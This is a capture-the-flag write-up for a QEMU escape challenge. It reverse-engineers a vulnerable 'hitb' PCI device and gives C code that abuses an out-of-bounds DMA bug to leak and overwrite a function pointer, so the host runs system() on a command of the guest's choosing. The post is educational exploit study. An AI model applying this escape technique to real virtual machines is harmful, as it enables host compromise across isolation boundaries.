Before we start, I just want to say that I did not play this CTF and probably would not have completed this challenge in time even if I had. A couple of teammates and I worked through this challenge, SCSI, and q-escape as exercises, and I wanted to document the methods and analysis.
The challenge incorporates a vulnerable PCI device which uses DMA and memory-mapped I/O (MMIO). There is an out-of-bounds bug in one of the DMA handlers that allows us to read and write past the dma_buf buffer on the host.
From the command-line arguments used to start the challenge we can see there is a custom device, -device hitb; luckily for us, qemu-system-x86_64 is compiled with debugging symbols. If we search for "hitb" in IDA (View -> Open Subviews -> Local Types) we can see the HitbState definition used to manage the hitb device's state.
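For reference, here is HitbState roughly as IDA's Local Types shows it, reconstructed from my notes. The QEMU typedefs below are size stand-ins so the snippet compiles on its own; exact sizes and field offsets may differ in your build, so treat this as a sketch, not the authoritative layout.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stddef.h>

/* Stand-ins for the QEMU types so this sketch is self-contained;
 * in the real source these come from QEMU's headers and their
 * sizes here are placeholders. */
typedef struct { char opaque[0x8f0]; } PCIDevice;
typedef struct { char opaque[0x100]; } MemoryRegion;
typedef struct { char opaque[0x10]; }  QemuThread;
typedef struct { char opaque[0x28]; }  QemuMutex;
typedef struct { char opaque[0x30]; }  QemuCond;
typedef struct { char opaque[0x30]; }  QEMUTimer;
typedef uint64_t dma_addr_t;

/* HitbState as recovered in IDA (layout approximate) */
typedef struct {
    PCIDevice pdev;
    MemoryRegion mmio;
    QemuThread thread;
    QemuMutex thr_mutex;
    QemuCond thr_cond;
    bool stopping;
    uint32_t addr4;
    uint32_t fact;
    uint32_t status;
    uint32_t irq_status;
    struct dma_state {
        dma_addr_t src;
        dma_addr_t dst;
        dma_addr_t cnt;
        dma_addr_t cmd;
    } dma;
    QEMUTimer dma_timer;
    char dma_buf[4096];            /* the buffer the DMA handler indexes */
    void (*enc)(char *, unsigned); /* function pointer right after dma_buf */
    uint64_t dma_mask;
} HitbState;
```

The important detail for later is the tail of the struct: the enc function pointer sits immediately after the 4096-byte dma_buf.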
Next, if we head over to the Functions subview in IDA and search for "hitb_", we will find all of the functions associated with the "hitb" device. Initialization starts with the device's class_init function, so let's start from there.
Initially IDA recognizes pdev as an ObjectClass (which, if this were C++, would be the base class); however, if we change its type to PCIDeviceClass, which it should be after the cast, we can see the properties this PCI device is registered with, along with two callbacks. The uninit callback is irrelevant to us, as it just cleans up after the device is unloaded. The second callback, pci_hitb_realize, is where the MMIO region is allocated, the MMIO ops are registered, and the thread that performs the DMA is started.
Moving on to the MMIO ops: hitb_mmio_read can return any relevant HitbState field to the guest, while hitb_mmio_write changes the state of the device and sends commands to the DMA thread. I will condense its functionality to the relevant commands.
When analyzing the hitb handlers (the MMIO ops, realize, and the DMA thread), don't forget to change the declared type of the handler's first argument from void *opaque to HitbState *hitb; this makes the struct field accesses readable.
Finally, we just need to analyze hitb_dma_timer to understand how memory transfers via DMA are handled.
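To make the bug concrete, here is a toy model of the timer's copy path. The 0x40000 base and the exact semantics are assumptions from my disassembly, and the real code calls cpu_physical_memory_rw rather than memcpy; the point is that the guest-supplied DMA address is translated by subtracting a base and then used to index dma_buf with no check that the result stays inside the 4096-byte buffer.

```c
#include <stdint.h>
#include <string.h>

#define DMA_BASE 0x40000u  /* base the handler subtracts (assumed) */

/* toy stand-in for the tail of HitbState */
struct toy_state {
    char dma_buf[4096];
    void (*enc)(char *, unsigned); /* sits right after dma_buf */
};

/* dma_buf -> guest RAM direction (cpu_physical_memory_rw with
 * is_write=1 in the real code; modeled here with memcpy) */
static void dma_read(struct toy_state *s, uint64_t src, char *out, uint64_t cnt)
{
    /* OOB read whenever src >= DMA_BASE + 4096 */
    memcpy(out, s->dma_buf + (src - DMA_BASE), cnt);
}

/* guest RAM -> dma_buf direction */
static void dma_write(struct toy_state *s, uint64_t dst, const char *in, uint64_t cnt)
{
    /* OOB write whenever dst >= DMA_BASE + 4096 */
    memcpy(s->dma_buf + (dst - DMA_BASE), in, cnt);
}
```

With src set to DMA_BASE + 4096, dma_read hands us the 8 bytes immediately past dma_buf, i.e. the enc function pointer; dma_write at the same offset overwrites it.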
The only thing left to figure out is where the MMIO region is actually mapped. For that we first need to identify the PCI device in the system with lspci.
To interact with the MMIO region we have two options (that I know of): mmap-ing the sysfs resource0 file the way pcimem does, or using the /dev/mem device, which represents the physical memory of the system. Since I've done it before with pcimem, this time I will use /dev/mem. Offsets into /dev/mem are interpreted as physical addresses, so to access the MMIO region we need to open and mmap /dev/mem at offset 0xfea00000 with size 0x100000.
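A minimal sketch of that mapping plus two access helpers. 0xfea00000 is where lspci reported the BAR in my setup, so check yours; the open requires root inside the guest and will fail on kernels built with strict /dev/mem protections.

```c
#include <fcntl.h>
#include <stdint.h>
#include <stddef.h>
#include <sys/mman.h>
#include <unistd.h>

#define MMIO_PHYS 0xfea00000ul  /* BAR0 address from lspci (assumed) */
#define MMIO_SIZE 0x100000ul

/* Map the device's MMIO region through /dev/mem; NULL on failure. */
static volatile void *map_mmio(void)
{
    int fd = open("/dev/mem", O_RDWR | O_SYNC);
    if (fd < 0)
        return NULL;
    void *p = mmap(NULL, MMIO_SIZE, PROT_READ | PROT_WRITE,
                   MAP_SHARED, fd, MMIO_PHYS);
    close(fd);
    return p == MAP_FAILED ? NULL : p;
}

/* 64-bit register accessors; volatile so the compiler does not
 * cache or reorder the device accesses. */
static void mmio_write64(volatile void *base, uint64_t off, uint64_t val)
{
    *(volatile uint64_t *)((volatile char *)base + off) = val;
}

static uint64_t mmio_read64(volatile void *base, uint64_t off)
{
    return *(volatile uint64_t *)((volatile char *)base + off);
}
```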
cpu_physical_memory_rw(hwaddr addr, uint8_t *buf, int len, int is_write) provides us with arbitrary read and write. When the is_write parameter is set, the function writes to the physical address (PA) addr from the source virtual address (VA) buf. When is_write is unset, the direction is reversed: the VA buf becomes the destination and the PA addr the source. With no boundary checks on the VA buf in hitb_dma_timer, let's see what we can access.
Thanks to the symbols we can see that the hitb_enc function pointer sits right after dma_buf. Our goal is to leak that pointer and overwrite it with the address of system@PLT; this way we can call system on the host with arguments we control from the guest.
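Putting the pieces together, the flow looks roughly like this. The register offsets, command bits, and the 0x40000 DMA base are my read of hitb_mmio_write and hitb_dma_timer, so treat all of them as assumptions to verify against your own disassembly; system@PLT is computed from the leaked enc pointer using offsets taken from the qemu-system-x86_64 binary.

```c
#include <stdint.h>
#include <unistd.h>

/* Assumed MMIO register layout of the hitb device */
enum { REG_SRC = 0x80, REG_DST = 0x88, REG_CNT = 0x90, REG_CMD = 0x98 };
/* Assumed command bits: start bit, dma_buf->RAM direction, encrypt */
enum { CMD_START = 1, CMD_TO_RAM = 2, CMD_ENC = 4 };
#define DMA_BASE 0x40000ul  /* base subtracted before indexing dma_buf */
#define BUF_SIZE 4096ul

static void reg_w(volatile char *mmio, uint64_t off, uint64_t v)
{
    *(volatile uint64_t *)(mmio + off) = v;
}

/* Program one transfer and kick the DMA timer via the start bit. */
static void dma_cmd(volatile char *mmio, uint64_t src, uint64_t dst,
                    uint64_t cnt, uint64_t cmd)
{
    reg_w(mmio, REG_SRC, src);
    reg_w(mmio, REG_DST, dst);
    reg_w(mmio, REG_CNT, cnt);
    reg_w(mmio, REG_CMD, cmd | CMD_START);
    usleep(100 * 1000); /* give the DMA timer a tick to run */
}

/* 1. leak: enc lives at dma_buf+4096, so "DMA" the 8 bytes at
 *    DMA_BASE+BUF_SIZE into a guest physical page we own. */
static void leak_enc(volatile char *mmio, uint64_t guest_pa)
{
    dma_cmd(mmio, DMA_BASE + BUF_SIZE, guest_pa, 8, CMD_TO_RAM);
}

/* 2. overwrite: copy the command string (e.g. "cat /flag") into
 *    dma_buf, overwrite enc with system@PLT, then fire the encrypt
 *    path so the device calls enc(dma_buf) == system("cat /flag"). */
static void hijack(volatile char *mmio, uint64_t pa_cmdstr, uint64_t pa_sysptr)
{
    dma_cmd(mmio, pa_cmdstr, DMA_BASE, 16, 0);            /* string -> dma_buf */
    dma_cmd(mmio, pa_sysptr, DMA_BASE + BUF_SIZE, 8, 0);  /* enc = system@PLT */
    dma_cmd(mmio, DMA_BASE, 0, 16, CMD_ENC | CMD_TO_RAM); /* trigger enc() */
}
```

The guest physical addresses passed in come from the VA-to-PA translation described next.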
To resolve a VA to a PA from userland we can use /proc/self/pagemap with the following function.
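A version of that helper might look like this. The pagemap entry format (PFN in bits 0-54, "present" flag in bit 63) is documented in the kernel's pagemap documentation; note that without CAP_SYS_ADMIN modern kernels zero the PFN, and you should mlock the page (or at least touch it first) so it stays resident.

```c
#include <fcntl.h>
#include <stdint.h>
#include <unistd.h>

/* Translate a userspace VA to a physical address via /proc/self/pagemap.
 * Returns 0 on failure or if the page is not present. */
static uint64_t virt_to_phys(void *addr)
{
    uint64_t va = (uint64_t)addr;
    uint64_t entry = 0;

    int fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0)
        return 0;
    /* one 8-byte entry per 4096-byte page */
    if (pread(fd, &entry, 8, (va / 4096) * 8) != 8)
        entry = 0;
    close(fd);

    if (!(entry & (1ull << 63))) /* present bit */
        return 0;
    uint64_t pfn = entry & ((1ull << 55) - 1); /* bits 0-54 */
    return pfn * 4096 + (va & 0xfff);
}
```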
If we imagine a scenario where we have to deliver our exploit to the server and there is no compiler there, we would have to transfer a statically compiled version of the exploit. To reduce its size to a minimum we can use musl-gcc, optimize for size, and strip the symbols. We can shrink it even further by replacing the libc API calls with direct syscalls (per vakzz's suggestion).
To deliver the exploit locally we only need to append the file to the file system (the cpio archive).